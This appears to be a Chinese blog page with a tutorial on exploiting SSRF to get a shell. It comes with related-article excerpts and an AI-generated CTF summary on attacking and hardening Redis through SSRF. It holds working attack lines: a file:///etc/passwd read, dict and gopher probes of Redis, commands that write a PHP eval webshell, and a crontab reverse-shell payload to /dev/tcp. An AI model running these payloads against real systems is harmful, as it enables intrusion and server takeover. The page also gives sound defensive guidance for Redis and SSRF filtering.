实战getshell新姿势-SSRF漏洞利用与getshell实战

最新推荐文章于 2025-06-03 21:59:24 发布
转载 最新推荐文章于 2025-06-03 21:59:24 发布 · 8.2k 阅读 · 15

本文深入探讨SSRF漏洞的常见场景与危害,演示利用Curl进行漏洞探测,并通过Python实现端口扫描,最后展示如何利用Discuz的SSRF漏洞获取shell权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

实战getshell新姿势-SSRF漏洞利用与getshell实战

一、什么地方最容易出现SSRF

  1. 云服务器商。(各种网站数据库操作)
  2. 有远程图片加载的地方。(编辑器之类的有远程图片加载啊)
  3. 网站采集、网页抓取的地方。(很多网站会有新闻采集输入url然后一键采集)
  4. 头像的地方。(某易就喜欢远程加载头像,例如:http://xxoo.com/image?url=http://1.jpg)
  5. 最后一个一切要你输入网址的地方和可以输入ip的都放,都是ssrf的天下。

二、SSRF漏洞危害

  1. 对服务器所在的内网进行端口扫描,获取一些服务的banner信息等
  2. 攻击运行在内网或者本地的应用程序
  3. 对内网WEB应用进行指纹识别,通过访问默认文件实现(Readme等文件)
  4. 攻击内外网的WEB应用,主要是GET就可以实现的攻击(比如Struts2,SQL注入等)
  5. 下载内网资源(利用file协议读取本地文件等)
  6. 利用Redis未授权访问,HTTP CRLF注入达到getshell
  7. wooyun峰会猪猪侠的ppt
  8. 进行跳板
  9. 无视cdn

三、SSRF 神器 Curl 的使用

查看 curl 支持的协议列表 curl-config -protocols

  1. 使用 curl 读取文件 curl -v file://etc/passwd
  2. 使用 ftp 协议 curl -v “ftp://127.0.0.1:6666/info
  3. 使用 dict 协议 curl -v “dict://127.0.0.1:6666/info”
  4. 使用 gopher 协议 curl -v “gopher://127.0.0.1:6666/_info”

四、最常用的跳转绕过

一些服务器可能限定了只能使用http和https,这样就可以通过header跳转绕过

五、Python + SSRF 实现端口扫描

1. 简单的端口扫描

在这里插入图片描述

2. 同时观察 Wireshark 整个扫描流程

在这里插入图片描述

3. 代码实现

在这里插入图片描述

4. 验证本地是否开启了相应的端口

在这里插入图片描述

5. Python 代码编写的思路:

端口存在连接会一直在连接,连接时间会很长

端口不存在的连接会被立马刷新

六、利用 Discuz 的 SSRF 漏洞 Getshell

博客链接地址:http://hacker.feiyulive.com/wordpress/index.php/30/

CVE-2021-21975 VMware SSRF漏洞复现
afei001
04-05 914
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞原理 5.漏洞复现 5.1 FOFA实战复现 5.2 Dnslog验证&反弹shell 5.3 CVE_2021_21975_VMware_SSRF.py 6.漏洞修复 1.漏洞概述 vRealize Operations Manager 是 vmware 官方提供的针对 vmware 虚拟化平台的一套运维管理解决方案。2021 年 3 月 31 日,VMware 官方发布安全公告,披露了 CVE-20...
Weblogic SSRF漏洞利用
Zane·S的博客
05-25 1051
漏洞产生原因: 是指Web服务提供从用户指定的URL读取数据并展示功能又未 对用户输入的URL进行过滤,导致攻击者可借助服务端实现访问其本无权访问的URL。 攻击者无权访问的URL主要是内网,而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息, 所以SSRF的一大利用是探测内网端口开放信息。(所以SSRF归类为信息泄漏类型) 漏洞利用: 1.1、直接访问:http://ip...
Weblogic SSRFGetshell
干铮的博客
01-29 697
Weblogic SSRF漏洞 描述:Weblogic中存在SSRF漏洞利用漏洞可以任意HTTP请求,进而攻击内网redis/fastcgi等脆弱组件。 1.环境搭建 环境采用vulhub的docker环境 启动环境路径 vulhub/weblogic/ssrf 启动环境命令 docker-compose build docker-compose up -d 访问http://your-ip:7001/uddiexplorer/ 无需登录即可查看uddiexploer应用 2.S..
CSRF&SSRF漏洞
2501_91578299的博客
06-03 1609
在网络安全的广袤领域中,CSRF SSRF 漏洞犹如隐藏在暗处的 “网络刺客”,悄无声息地威胁着用户数据安全系统稳定。对于刚踏入网安大门的手小白而言,这两大漏洞的原理防护知识既是亟需攻克的难关,也是开启网络安全技术探索之旅的重要钥匙。为帮助大家快速入门,本文精心梳理出全网最全面的 CSRF、SSRF 漏洞讲解实战演练,以通俗易懂的语言和详细步骤,带您揭开网络安全攻防的神秘面纱,筑牢网络安全的认知基石。
SSRF+Redis未授权getshell
yuan_boss的博客
04-14 2226
当一个网站具有ssrf漏洞,如果没有一些过滤措施,比如没过滤file协议,gophere协议,dict等协议,就会导致无法访问的内网服务器信息泄露,甚至可以让攻击者拿下内网服务器权限。
Zimbra xxe+ssrf导致getshell
一个安全研究员
03-26 6691
我分析的第一个java漏洞
SSRF02】服务器端请求伪造——WebLogic架构漏洞复现之从SSRF==>未授权访问==>GetShell
Fighting_hawk的博客
03-16 4610
1. 掌握SSRF漏洞挖掘的方法; 2. 掌握利用SSRF漏洞进行内网扫描; 3. 本实验中未涉及SSRF利用时绕过的方法; 4. 后续将研究如何成功反弹shell
ssrf结合redis未授权getshell
07-07 1588
原理即为攻击者通过SSRF访问内网或本地的redis6379端口,如果刚好存在redis未授权,即可getshell
渗透测试-SSRF漏洞总结
cdyunaq的博客
02-08 2583
漏洞介绍 SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求,利用服务器端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务器端发起的,所以服务器能请求到自身相连而外网隔离的内部系统)。 靶场推荐: https://github.com/m6a-UdS/ssrf-lab 缺陷代码参考: # 模拟SSRF,使用curl发起网络请求后返回客户端,请求加载文件 <?php $ch = curl_
Weblogic-SSRF漏洞复现
hacker3062的博客
09-11 453
应为这一阵正好在学习SSRF漏洞,又苦于本人太菜没有挖到SSRF,只能复现…Weblogic中存在一个SSRF漏洞利用漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件,是指Web服务提供从用户指定的URL读取数据并展示功能又未对用户输入的URL进行过滤,导致攻击者可借助服务端实现访问其本无权访问的URL。攻击者无权访问的URL主要是内网,而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息,所以SSRF的一大利用是探测内网端口开放信息。
ssrf 过滤.php,SSRF详细利用方式及getshell
weixin_33955394的博客
03-22 634
本文将分为三个部分讲解0x01 ssrf本地远程及其他验证漏洞方式0x02 ssrf利用redis未授权getshell0x03 ssrf常见的绕过方式0x01 ssrf本地及远程验证方式重复现一下 顺便复习一下curl和监听端口的命令无回显的ssrf验证本地开启apache服务 在存在ssrf处访问http://10.1.1.200(本机服务地址)查看kali机器服务器日志信息:tail -...
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
Demo不是emo的博客
09-17 3714
今天的内容是ssrf漏洞利用,环境选择的是discuz含有ssrf漏洞的版本,通过该漏洞来写入redis计划任务反弹shell(附带环境安装包)
ssrf redis getshell 写私钥_csrf和ssrf总结
weixin_39850697的博客
11-22 538
1.csrf跨站请求伪造CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。在没有关闭相关网页的情况下,点击其他人发来的CSRF链接,利用客户端的cookie直接向服务器发送请求。原理:攻击者通过盗用用户身份悄悄发送一个请求,或执...
ssrf redis getshell 写私钥_SSRF 漏洞记录
weixin_39752880的博客
11-22 540
0x00:漏洞原理SSRF(Server-Side Request Forgery)也属于应用层上的一个漏洞类型,用一个最简单的例子来理解这个漏洞:比如一个添加图文的功能,填入标题内容和封面图然后提交在网站前台显示,对于这个功能的图片它除了可以让你上传以外,还支持填入远程图片地址,如果你填入了远程的图片地址,则该网站会加载远程图过来进行显示,而如果程序写法不严谨或者过滤不严格,则加载图片...
SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell
m0_64378913的博客
07-04 1593
概述:Weblogic中存在一个SSRF漏洞利用漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。redis存在未授权访问漏洞(在访问redis数据库时,无需提供用户名及密码,且具备root权限读写文件)。影响范围:版本10.0.2、版本10.3.6。WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Jav
利用Weblogic中间件存在的SSRF漏洞结合redis未授权访问漏洞GetShell
wenqingshuo321的博客
10-11 938
在Search Public Registries,选择Public Registry中的 IBM,同时勾选Search by business name,开启bp进行抓包,点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令,将其写入redis的容器里里面的/etc/crontab,从而将shell反弹到本地物理机ip的1234端口。
【burpsuite安全练兵场-服务端9】服务端请求伪造SSRF漏洞-7个实验(全)
01-11 9682
【BP靶场portswigger-服务端9-服务端请求伪造SSRF漏洞】7个实验-万文详细步骤
SSRF服务器端请求伪造漏洞之——攻防实战防范方法
温柔小薛的博客
04-10 1177
攻防实战防范方法 bWAPP 中的 SSRF 给出了 3 个小实验来说明 SSRF利用场景 任务 1:使用远程文件包含进行端口扫描(内网探测) 点击任务 1 中的 Port scan 可以获得一份端口扫描的攻击脚本 仅需要包含脚本,并请求 IP 参数为对应的主机即可,接下来就是利用 bWAPP 中的远程文件包含漏洞,执行端口扫描的脚本 Choose your bug 中选择 Remote ...
ctf-ssrf-redis
最新发布
06-14
<think>我们正在讨论CTF比赛中SSRF(Server-SideRequestForgery)和Redis相关的攻击或防御技巧。根据提供的引用,攻击者常利用SSRF漏洞通过特定的协议(如dict或gopher)内网的Redis服务交互,进而实现未授权访问、写入Webshell或执行其他恶意操作。以下是相关的攻击技巧和防御方法的总结:###攻击技巧1.**利用dict协议攻击Redis**(引用[1]):-通过SSRF发送dict协议的请求到Redis服务,可以执行Redis命令。-典型攻击步骤:-设置Redis的工作目录:`configsetdir/var/www/html`-设置保存的文件名:`configsetdbfilenamewebshell.php`-写入Webshell内容:`settest"<?php@eval($_POST['cmd']);?>"`(注意:这里的引号需要正确转义)-保存:`save`-这样就在Web目录下写入了webshell.php文件,攻击者可以通过蚁剑等工具连接。2.**利用gopher协议攻击Redis**(引用[2]):-gopher协议功能更强大,可以发送多行命令。-使用工具(如gopherus)生成攻击payload:-生成Redis的payload:`./gopherus.py--exploitredis`-输入要执行的PHP代码(如`<?phpeval($_POST["123"]);?>`),生成gopher链接。-由于gopher协议在传输中需要正确编码,通常需要二次URL编码。-将生成的payload通过SSRF漏洞发送,即可在目标服务器上写入Webshell。3.**绕过过滤**(引用[3]):-题目中可能过滤了`file://`、`dict`、`127.0.0.1`、`localhost`等关键词。-绕过方法:-使用IP的十进制表示(如`2130706433`代表`127.0.0.1`)或`0.0.0.0`。-使用DNS重绑定技术。-使用非标准端口或协议(如http协议访问Redis的6379端口,但Redis不支持HTTP,所以通常用gopher或dict)。-利用URL解析特性,如`http://abc@127.0.0.1`、`http://127.0.0.1:80@evil.com`等。###防御技巧1.**过滤输入**:-对用户输入的URL进行严格检查,禁止访问内网IP和特殊协议(如dict、gopher)。-使用正则表达式过滤,但要注意绕过技巧(如IP的多种表示形式)。2.**限制协议**:-只允许HTTP/HTTPS协议,禁止其他协议。3.**网络隔离**:-将关键服务(如Redis)置于内网,并设置防火墙规则,禁止外部访问。4.**Redis安全配置**:-为Redis设置强密码认证。-限制Redis的绑定IP(不要绑定在0.0.0.0)。-以低权限用户运行Redis,并限制其文件写入权限。5.**使用SSRF防护机制**:-在服务端设置请求的目标地址白名单。-使用DNS解析并验证目标IP是否在允许范围内。###示例:攻击Redis写入Webshell假设存在SSRF漏洞,且内网Redis无认证,攻击者可以构造如下dict协议的请求(注意空格和换行需要正确编码):```dict://127.0.0.1:6379/configsetdir/var/www/htmldict://127.0.0.1:6379/configsetdbfilenameshell.phpdict://127.0.0.1:6379/settest"<?php@eval($_POST['cmd']);?>"dict://127.0.0.1:6379/save```但实际中,由于dict协议一次只能发送一个命令,且需要多个请求,因此通常使用gopher协议在一个请求中发送多个命令。###注意事项-在CTF中,Redis可能运行在非默认端口或需要绕过过滤。-写入Webshell的路径需要可写,且Web服务器能够解析。§§相关问题§§1.如何防御SSRF攻击Redis?2.在CTF中,如果过滤了dict和gopher协议,还有哪些方法可以利用SSRF攻击Redis?3.Redis除了写入Webshell,还可以利用SSRF进行哪些攻击?</think>### CTF SSRF Redis攻击防御技巧 在CTF比赛中,SSRF(服务端请求伪造)结合Redis的攻击是常见题型。以下是关键技巧总结: --- #### **攻击技巧(利用SSRF操作Redis)** 1. **协议利用** - **dict协议**:直接发送Redis命令(需URL编码) ```http dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html ``` - **gopher协议**(更强大):支持多行命令,常用工具`gopherus`生成Payload ```python # 生成Payload示例(自动处理换行编码) ./gopherus.py --exploit redis ``` 2. **写入Webshell** - 经典四步操作: ```redis CONFIG SET dir /var/www/html # 设置保存目录 CONFIG SET dbfilename shell.php # 设置文件名 SET payload "<?php eval($_POST['cmd']);?>" # 写入恶意代码 SAVE # 保存到文件 ``` - 需注意特殊字符转义(如`<`需转为`<`) 3. **绕过过滤** - **IP绕过**:用`0.0.0.0`、`2130706433`(127.0.0.1的整数形式)或`localhost`替代 - **协议绕过**:若过滤`dict/gopher`,尝试`http://0.0.0.0:6379/?`(需Redis支持HTTP) - **分块编码**:对Payload二次URL编码(引用[2]示例) 4. **其他利用方式** - 写计划任务:`CONFIG SET dir /var/spool/cron/` - 主从复制攻击:通过`SLAVEOF`命令控制Redis从恶意服务器加载模块 - 读取敏感文件:`CONFIG GET *`获取Redis配置 --- #### **防御技巧** 1. **输入过滤** - 协议黑名单:禁用`file://`、`dict://`、`gopher://` - IP/域名限制:过滤`127.0.0.1`、`localhost`、内网IP段 - 正则强化:检测异常路径(如`/var/spool/cron`) 2. **Redis加固** ```bash # 关键配置 bind 127.0.0.1 # 只监听本地 requirepass "强密码" # 启用认证 rename-command CONFIG "" # 禁用危险命令 ``` 3. **服务隔离** - 将Redis部署在内网,禁止公网访问 - 使用防火墙限制6379端口的来源IP 4. **权限控制** - Redis以低权限用户运行(非root) - 限制Web目录写权限(防止写Shell--- #### **CTF实战要点** 1. **判断Redis存在**:尝试访问`http://target:6379`若返回`-ERR wrong number of arguments`则存在。 2. **编码处理**: - 使用工具(如gopherus)自动生成编码后的Payload - 二次URL编码绕过WAF(引用[2]案例) 3. **回显利用**:若命令无回显,可通过延时或DNS外带数据判断执行结果。 > 参考案例:某CTF题通过SSRF的gopher协议发送Redis命令写入Webshell,最终用蚁剑连接获取flag(引用[2])。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值